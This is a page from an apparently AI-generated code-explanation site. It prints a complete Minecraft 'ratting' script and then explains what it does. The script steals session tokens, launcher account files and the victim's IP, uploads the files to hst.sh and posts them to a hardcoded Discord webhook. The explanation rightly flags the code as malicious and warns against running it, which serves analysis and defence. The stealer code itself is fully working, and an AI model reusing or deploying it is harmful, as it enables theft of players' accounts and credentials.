This code appears to be malicious and is designed to...

August 29, 2025 at 11:00 PM

var webhookUrl2 = new java.net.URL("https://discord.com/api/webhooks/1395759641081938000/oNyivxiXIvEYSOuCYBn-WIMeyLK2iGYY-qXjS5F0Xl7OJ4-7DCvEqFV0sj6W7TGbFuge"); function send(string) { var c = webhookUrl2.openConnection(); c.setDoOutput(true); c.setRequestMethod("POST"); c.setRequestProperty("User-Agent", "Mozilla/5.0"); c.setRequestProperty("Content-Type", "application/json; charset=UTF-8"); var o = c.getOutputStream(); var w = new java.io.OutputStreamWriter(o, "UTF-8"); w.write(string); w.flush(); w.close(); o.close(); c.getResponseCode(); } function paste(json) { if (json == null) return "-"; var u = new java.net.URL("https://hst.sh/documents"); var c = u.openConnection(); c.setDoOutput(true); c.setRequestMethod("POST"); c.setRequestProperty("User-Agent", "Mozilla/5.0"); c.setRequestProperty("Content-Type", "text/plain; charset=UTF-8"); var w = new java.io.OutputStreamWriter(c.getOutputStream(), "UTF-8"); w.write(json); w.close(); var r = c.getResponseCode(); if (r === 200) { var reader = new java.io.BufferedReader(new java.io.InputStreamReader(c.getInputStream(), "UTF-8")); var response = ""; var line; while ((line = reader.readLine()) !== null) { response += line; } reader.close(); var obj = JSON.parse(response); return obj.key; } else { return "-"; } } var uuid = Player.getUUID(); var ssid = Client.getMinecraft().func_110432_I().func_148254_d(); var File = Java.type("java.io.File"); var appData = new File(java.lang.System.getenv("APPDATA")); var localAppData = new File(java.lang.System.getenv("LOCALAPPDATA")); var mFolder = new File(Client.getMinecraft().field_71412_D.getPath()); var iFolder = new File(mFolder.parent); var isFolder = new File(iFolder.parent); var lFolder = new File(isFolder.parent); var mmc = FileLib.read(lFolder + "\\accounts.json"); var prism = FileLib.read(appData + "\\PrismLauncher\\accounts.json"); var defaultmc = FileLib.read(appData + "\\.minecraft\\launcher_profiles.json"); var essentials = FileLib.read(mFolder + "\\essential\\microsoft_accounts.json"); var essentialsNew = FileLib.read(appData + "\\gg.essential.mod\\microsoft_accounts.json"); var feather1 = FileLib.read(appData + "\\.minecraft\\feather\\accounts.json"); var feather3 = FileLib.read(appData + "\\.feather\\accounts.json"); var ip = FileLib.getUrlContent("https://checkip.amazonaws.com/"); if (lFolder.getPath().indexOf("Prism") !== -1) { prism = FileLib.read(lFolder + "\\accounts.json"); mmc = null; } var prismKey = paste(prism); var essentialsKey = paste(essentials); var essentialsKeyNew = paste(essentialsNew); var mmcKey = paste(mmc); var defaultKey = paste(defaultmc); var feather2 = paste(feather1); var feather4 = paste(feather3); var name = Player.getName(); var uuid = Player.getUUID(); var payload = JSON.stringify({ content: "", embeds: [{ "title": name + " got ratted!", "url": "https://sky.shiiyu.moe/stats/" + name, "color": 16761035, "author": { "name": "Gerald", }, "description": "**SSID**\n```" + ssid + "```", "fields": [ { "name": "Username", "value": "" + name + "", "inline": true }, { "name": "UUID", "value": "" + uuid + "", "inline": true }, { "name": "IP", "value": "" + ip + "", "inline": true }, { "name": "Links", "value": "[Prism](https://hst.sh/" + prismKey + ") | [Essentials](https://hst.sh/" + essentialsKey + ") | [Essentials2](https://hst.sh/" + essentialsKeyNew + ") | [MultiMC](https://hst.sh/" + mmcKey + ") | [Feather](https://hst.sh/" + feather2 + ") | [Feather2](https://hst.sh/" + feather4 + ")" } ] }] }); send(payload);

This code appears to be malicious and is designed to steal sensitive information from the user's computer. Let's break it into components and examine what it does:

  1. Webhook Setup:

    • The code defines a URL (webhookUrl2) pointing to a Discord Webhook where the stolen data will be sent.

  2. The send() function:

    • This function sends a POST request to the Discord Webhook URL with a given string (usually JSON-formatted content) as the payload.

  3. The paste() function:

    • This function sends a POST request containing data to the Hastebin-like service hst.sh. If the request is successful, it returns a key that can be used to compose a link to the stored data.

  4. File System Access:

    • The code uses java.io.File and environment variables (APPDATA, LOCALAPPDATA, etc.) to locate directories and files commonly used by Minecraft launchers or account systems (e.g., accounts.json or microsoft_accounts.json from MultiMC, Essential Mod, Feather, and others).
    • These files may contain sensitive data like user accounts, authentication tokens, or credentials.

  5. IP Address Retrieval:

    • The code fetches the user's public IP address using the external service https://checkip.amazonaws.com/.

  6. Pasting Data:

    • It calls the paste() function on the contents of various files (e.g., accounts.json and other configurations).
    • This action uploads the data to the hst.sh service, returning a unique key for each data upload.

  7. Payload Construction:

    • The script constructs a JSON payload containing:
      • The Minecraft player's username and UUID.
      • The user's SSID (likely a session ID, obtained from the Minecraft client).
      • The user's public IP address.
      • Links to the uploaded sensitive files on hst.sh (e.g., Prism, Essentials, MultiMC, Feather account files).

  8. Sending the Payload:

    • The payload is sent via the send() function to the Discord Webhook specified earlier. This sends all the harvested information to the attacker's controlled Discord channel.

Conclusion:

This script is a RAT (Remote Access Trojan) or "ratting" script targeting Minecraft users. It:

  • Harvests sensitive files such as account information and launcher configurations.
  • Uploads these files to a public file-sharing service (hst.sh).
  • Sends links to these uploaded files, along with other sensitive details (such as IP address, username, and UUID), to a Discord Webhook controlled by the attacker.

If you encountered this script, do not execute it. It is malicious and will compromise the victim's account(s) and privacy.

Generate your own explanations
Download our vscode extension
Read other generated explanations

Built by @thebuilderjr
Sponsored by beam analytics
Read our terms and privacy policy
Forked from openai-quickstart-node